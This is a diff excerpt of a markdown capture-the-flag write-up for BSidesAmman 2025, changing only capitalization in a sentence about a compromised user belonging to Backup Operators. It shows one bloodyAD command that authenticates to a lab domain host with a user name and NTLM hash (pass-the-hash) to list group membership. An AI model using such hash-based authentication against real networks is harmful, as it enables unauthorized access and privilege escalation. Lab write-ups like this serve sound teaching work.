ASYNC-Security/async-security.github.io/bsidesamman-2025-writeup.md

 ### Group Enumeration

-Using this hash we can authenticate as this user and we could see that this user is a member of backup operators.
+Using this hash we can authenticate as this user and we could see that this user is a member of Backup Operators.

 ```
 bloodyAD --host 10.2.10.11 -d albalad.bsides.rv -u 'mustafa.yaseen'  -p ':409a45a42c916885ac56127bebf06225' get membership mustafa.yaseen